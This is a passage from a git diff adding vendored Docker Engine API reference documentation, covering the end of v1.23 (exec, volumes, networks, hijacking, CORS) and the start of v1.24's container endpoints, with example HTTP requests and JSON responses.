+Show the docker version information + +**Example request**: + + GET /v1.23/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.11.0", + "Os": "linux", + "KernelVersion": "3.19.0-23-generic", + "GoVersion": "go1.4.2", + "GitCommit": "e75da4b", + "Arch": "amd64", + "ApiVersion": "1.23", + "BuildTime": "2015-12-01T07:09:13.444803460+00:00", + "Experimental": true + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.23/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.23/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ], + "Labels": { + "key1": "value1", + "key2": "value2" + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") +- **pause** – 1/True/true or 0/False/false, 
whether to pause the container before committing +- **changes** – Dockerfile instructions to apply while committing + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. + +Docker containers report the following events: + + attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update + +Docker images report the following events: + + delete, import, pull, push, tag, untag + +Docker volumes report the following events: + + create, mount, unmount, destroy + +Docker networks report the following events: + + create, connect, disconnect, destroy + +**Example request**: + + GET /v1.23/events?since=1374067924 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + Server: Docker/1.11.0 (linux) + Date: Fri, 29 Apr 2016 15:18:06 GMT + Transfer-Encoding: chunked + + { + "status": "pull", + "id": "alpine:latest", + "Type": "image", + "Action": "pull", + "Actor": { + "ID": "alpine:latest", + "Attributes": { + "name": "alpine" + } + }, + "time": 1461943101, + "timeNano": 1461943101301854122 + } + { + "status": "create", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "create", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101381709551 + } + { + "status": "attach", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "attach", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + 
"com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101383858412 + } + { + "Type": "network", + "Action": "connect", + "Actor": { + "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474", + "Attributes": { + "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "name": "bridge", + "type": "bridge" + } + }, + "time": 1461943101, + "timeNano": 1461943101394865557 + } + { + "status": "start", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "start", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943101, + "timeNano": 1461943101607533796 + } + { + "status": "resize", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "resize", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "height": "46", + "image": "alpine", + "name": "my-container", + "width": "204" + } + }, + "time": 1461943101, + "timeNano": 1461943101610269268 + } + { + "status": "die", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "die", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "exitCode": "0", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943105, + "timeNano": 1461943105079144137 + } + { + "Type": "network", + "Action": "disconnect", + "Actor": { + "ID": 
"7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474", + "Attributes": { + "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "name": "bridge", + "type": "bridge" + } + }, + "time": 1461943105, + "timeNano": 1461943105230860245 + } + { + "status": "destroy", + "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "from": "alpine", + "Type": "container", + "Action": "destroy", + "Actor": { + "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743", + "Attributes": { + "com.example.some-label": "some-label-value", + "image": "alpine", + "name": "my-container" + } + }, + "time": 1461943105, + "timeNano": 1461943105338056026 + } + +**Query parameters**: + +- **since** – Timestamp. Show all events created since timestamp and then stream +- **until** – Timestamp. Show events created until given timestamp and stop streaming +- **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters: + - `container=`; -- container to filter + - `event=`; -- event to filter + - `image=`; -- image to filter + - `label=`; -- image and container label to filter + - `type=`; -- either `container` or `image` or `volume` or `network` + - `volume=`; -- volume to filter + - `network=`; -- network to filter + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images in a repository + +`GET /images/(name)/get` + +Get a tarball containing all images and metadata for the repository specified +by `name`. + +If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image +(and its parents) are returned. If `name` is an image ID, similarly only that +image (and its parents) are returned, but with the exclusion of the +'repositories' file in the tarball, as there were no image names referenced. + +See the [image tarball format](#image-tarball-format) for more details. 
+ +**Example request** + + GET /v1.23/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. + +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.23/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. +See the [image tarball format](#image-tarball-format) for more details. 
+ +**Example request** + + POST /v1.23/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + Transfer-Encoding: chunked + + {"status":"Loading layer","progressDetail":{"current":32768,"total":1292800},"progress":"[= ] 32.77 kB/1.293 MB","id":"8ac8bfaff55a"} + {"status":"Loading layer","progressDetail":{"current":65536,"total":1292800},"progress":"[== ] 65.54 kB/1.293 MB","id":"8ac8bfaff55a"} + {"status":"Loading layer","progressDetail":{"current":98304,"total":1292800},"progress":"[=== ] 98.3 kB/1.293 MB","id":"8ac8bfaff55a"} + {"status":"Loading layer","progressDetail":{"current":131072,"total":1292800},"progress":"[===== ] 131.1 kB/1.293 MB","id":"8ac8bfaff55a"} + ... + {"stream":"Loaded image: busybox:latest\n"} + +**Example response**: + +If the "quiet" query parameter is set to `true` / `1` (`?quiet=1`), progress +details are suppressed, and only a confirmation message is returned once the +action completes. + + HTTP/1.1 200 OK + Content-Type: application/json + Transfer-Encoding: chunked + + {"stream":"Loaded image: busybox:latest\n"} + +**Query parameters**: + +- **quiet** – Boolean value, suppress progress details during load. Defaults + to `0` / `false` if omitted. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. 
+ +If the tarball defines a repository, the tarball should also include a `repositories` file at +the root that contains a list of repository and tag names mapped to layer IDs. + +``` +{"hello-world": + {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"} +} +``` + +#### Exec Create + +`POST /containers/(id or name)/exec` + +Sets up an exec instance in a running container `id` + +**Example request**: + + POST /v1.23/containers/e90e34656806/exec HTTP/1.1 + Content-Type: application/json + + { + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "Cmd": ["sh"], + "DetachKeys": "ctrl-p,ctrl-q", + "Privileged": true, + "Tty": true, + "User": "123:456" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id": "f90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command. +- **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command. +- **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command. +- **DetachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **Tty** - Boolean value to allocate a pseudo-TTY. +- **Cmd** - Command to run specified as a string or an array of strings. +- **Privileged** - Boolean value, runs the exec process with extended privileges. +- **User** - A string value specifying the user, and optionally, group to run + the exec process inside the container. Format is one of: `"user"`, + `"user:group"`, `"uid"`, or `"uid:gid"`. + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **409** - container is paused +- **500** - server error + +#### Exec Start + +`POST /exec/(id)/start` + +Starts a previously set up `exec` instance `id`. If `detach` is true, this API +returns after starting the `exec` command. 
Otherwise, this API sets up an +interactive session with the `exec` command. + +**Example request**: + + POST /v1.23/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **409** - container is paused + +**Stream details**: + +Similar to the stream behavior of `POST /containers/(id or name)/attach` API + +#### Exec Resize + +`POST /exec/(id)/resize` + +Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters. +This API is valid only if `tty` was specified as part of creating and starting the `exec` command. + +**Example request**: + + POST /v1.23/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1 + Content-Type: text/plain + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: text/plain + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **201** – no error +- **404** – no such exec instance + +#### Exec Inspect + +`GET /exec/(id)/json` + +Return low-level information about the `exec` command `id`. 
+ +**Example request**: + + GET /v1.23/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "CanRemove": false, + "ContainerID": "b53ee82b53a40c7dca428523e34f741f3abc51d9f297a14ff874bf761b995126", + "DetachKeys": "", + "ExitCode": 2, + "ID": "f33bbfb39f5b142420f4759b2348913bd4a8d1a6d7fd56499cb41a1bb91d7b3b", + "OpenStderr": true, + "OpenStdin": true, + "OpenStdout": true, + "ProcessConfig": { + "arguments": [ + "-c", + "exit 2" + ], + "entrypoint": "sh", + "privileged": false, + "tty": true, + "user": "1000" + }, + "Running": false + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +### 2.4 Volumes + +#### List volumes + +`GET /volumes` + +**Example request**: + + GET /v1.23/volumes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Volumes": [ + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis" + } + ], + "Warnings": [] + } + +**Query parameters**: + +- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the volumes list. 
There is one available filter: `dangling=true` + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a volume + +`POST /volumes/create` + +Create a volume + +**Example request**: + + POST /v1.23/volumes/create HTTP/1.1 + Content-Type: application/json + + { + "Name": "tardis", + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis", + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + } + } + +**Status codes**: + +- **201** - no error +- **500** - server error + +**JSON parameters**: + +- **Name** - The new volume's name. If not specified, Docker generates a name. +- **Driver** - Name of the volume driver to use. Defaults to `local` for the name. +- **DriverOpts** - A mapping of driver options and values. These options are + passed directly to the driver and are driver specific. +- **Labels** - Labels to set on the volume, specified as a map: `{"key":"value","key2":"value2"}` + +#### Inspect a volume + +`GET /volumes/(name)` + +Return low-level information on the volume `name` + +**Example request**: + + GET /v1.23/volumes/tardis + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Name": "tardis", + "Driver": "local", + "Mountpoint": "/var/lib/docker/volumes/tardis/_data", + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + } + } + +**Status codes**: + +- **200** - no error +- **404** - no such volume +- **500** - server error + +#### Remove a volume + +`DELETE /volumes/(name)` + +Instruct the driver to remove the volume (`name`). 
+ +**Example request**: + + DELETE /v1.23/volumes/tardis HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** - no error +- **404** - no such volume or volume driver +- **409** - volume is in use and cannot be removed +- **500** - server error + +### 3.5 Networks + +#### List networks + +`GET /networks` + +**Example request**: + + GET /v1.23/networks?filters={"type":{"custom":true}} HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +[ + { + "Name": "bridge", + "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566", + "Scope": "local", + "Driver": "bridge", + "EnableIPv6": false, + "Internal": false, + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.0.0/16" + } + ] + }, + "Containers": { + "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": { + "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda", + "MacAddress": "02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + } + }, + { + "Name": "none", + "Id": "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794", + "Scope": "local", + "Driver": "null", + "EnableIPv6": false, + "Internal": false, + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + }, + { + "Name": "host", + "Id": "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e", + "Scope": "local", + "Driver": "host", + "EnableIPv6": false, + "Internal": false, + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + } +] +``` + +**Query 
parameters**: + +- **filters** - JSON encoded network list filter. The filter value is one of: + - `id=` Matches all or part of a network id. + - `name=` Matches all or part of a network name. + - `type=["custom"|"builtin"]` Filters networks by type. The `custom` keyword returns all user-defined networks. + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Inspect network + +`GET /networks/` + +**Example request**: + + GET /v1.23/networks/7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99 HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +{ + "Name": "net01", + "Id": "7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99", + "Scope": "local", + "Driver": "bridge", + "EnableIPv6": false, + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.19.0.0/16", + "Gateway": "172.19.0.1/16" + } + ], + "Options": { + "foo": "bar" + } + }, + "Internal": false, + "Containers": { + "19a4d5d687db25203351ed79d478946f861258f018fe384f229f2efa4b23513c": { + "Name": "test", + "EndpointID": "628cadb8bcb92de107b2a1e516cbffe463e321f548feb37697cce00ad694f21a", + "MacAddress": "02:42:ac:13:00:02", + "IPv4Address": "172.19.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + }, + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + } +} +``` + +**Status codes**: + +- **200** - no error +- **404** - network not found + +#### Create a network + +`POST /networks/create` + +Create a network + +**Example request**: + +``` +POST /v1.23/networks/create HTTP/1.1 +Content-Type: application/json + +{ + "Name":"isolated_nw", + 
"CheckDuplicate":true, + "Driver":"bridge", + "EnableIPv6": true, + "IPAM":{ + "Driver": "default", + "Config":[ + { + "Subnet":"172.20.0.0/16", + "IPRange":"172.20.10.0/24", + "Gateway":"172.20.10.11" + }, + { + "Subnet":"2001:db8:abcd::/64", + "Gateway":"2001:db8:abcd::1011" + } + ], + "Options": { + "foo": "bar" + } + }, + "Internal":true, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + }, + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + } +} +``` + +**Example response**: + +``` +HTTP/1.1 201 Created +Content-Type: application/json + +{ + "Id": "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30", + "Warning": "" +} +``` + +**Status codes**: + +- **201** - no error +- **404** - plugin not found +- **500** - server error + +**JSON parameters**: + +- **Name** - The new network's name. this is a mandatory field +- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false` +- **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver +- **Internal** - Restrict external access to the network +- **IPAM** - Optional custom IP scheme for the network + - **Driver** - Name of the IPAM driver to use. 
Defaults to `default` driver + - **Config** - List of IPAM configuration options, specified as a map: + `{"Subnet": , "IPRange": , "Gateway": , "AuxAddress": }` + - **Options** - Driver-specific options, specified as a map: `{"option":"value" [,"option2":"value2"]}` +- **EnableIPv6** - Enable IPv6 on the network +- **Options** - Network specific options to be used by the drivers +- **Labels** - Labels to set on the network, specified as a map: `{"key":"value" [,"key2":"value2"]}` + +#### Connect a container to a network + +`POST /networks/(id)/connect` + +Connect a container to a network + +**Example request**: + +``` +POST /v1.23/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4", + "EndpointConfig": { + "IPAMConfig": { + "IPv4Address":"172.24.56.89", + "IPv6Address":"2001:db8::5689" + } + } +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - network or container is not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **container** - container-id/name to be connected to the network + +#### Disconnect a container from a network + +`POST /networks/(id)/disconnect` + +Disconnect a container from a network + +**Example request**: + +``` +POST /v1.23/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4", + "Force":false +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - network or container not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **Container** - container-id/name to be disconnected from a network +- **Force** - Force the container to disconnect from a network + +#### Remove a network + +`DELETE /networks/(id)` + +Instruct the driver to remove the network (`id`). 
+ +**Example request**: + + DELETE /v1.23/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** - no error +- **404** - no such network +- **500** - server error + +## 3. Going further + +### 3.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. + +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 3.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + + +### 3.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. 
Set * (asterisk) allows all, +default or blank means CORS disabled + + $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar" diff --git a/vendor/github.com/docker/docker/docs/api/v1.24.md b/vendor/github.com/docker/docker/docs/api/v1.24.md new file mode 100644 index 0000000000..0cf4e2afab --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/v1.24.md @@ -0,0 +1,5316 @@ +--- +title: "Engine API v1.24" +description: "API Documentation for Docker" +keywords: "API, Docker, rcli, REST, documentation" +redirect_from: +- /engine/reference/api/docker_remote_api_v1.24/ +- /reference/api/docker_remote_api_v1.24/ +--- + + + +## 1. Brief introduction + + - The daemon listens on `unix:///var/run/docker.sock` but you can + [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket). + - The API tends to be REST. However, for some complex commands, like `attach` + or `pull`, the HTTP connection is hijacked to transport `stdout`, + `stdin` and `stderr`. + +## 2. Errors + +The Engine API uses standard HTTP status codes to indicate the success or failure of the API call. The body of the response will be JSON in the following format: + + { + "message": "page not found" + } + +The status codes that are returned for each endpoint are specified in the endpoint documentation below. + +## 3. 
Endpoints + +### 3.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.24/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 1", + "Created": 1367854155, + "State": "Exited", + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:02" + } + } + }, + "Mounts": [ + { + "Name": "fac362...80535", + "Source": "/data", + "Destination": "/data", + "Driver": "local", + "Mode": "ro,Z", + "RW": false, + "Propagation": "" + } + ] + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 222222", + "Created": 1367854155, + "State": "Exited", + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": 
"7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.8", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:08" + } + } + }, + "Mounts": [] + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "State": "Exited", + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.6", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:06" + } + } + }, + "Mounts": [] + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "State": "Exited", + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "d91c7b2f0644403d7ef3095985ea0e2370325cd2332ff3a3225c4247328e66e9", + "Gateway": "172.17.0.1", + "IPAddress": 
"172.17.0.5", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:05" + } + } + }, + "Mounts": [] + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. + Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`created`|`restarting`|`running`|`paused`|`exited`|`dead`) + - `label=key` or `label="key=value"` of a container label + - `isolation=`(`default`|`process`|`hyperv`) (Windows daemon only) + - `ancestor`=(`[:]`, `` or ``) + - `before`=(`` or ``) + - `since`=(`` or ``) + - `volume`=(`` or ``) + - `network`=(`` or ``) + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.24/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + 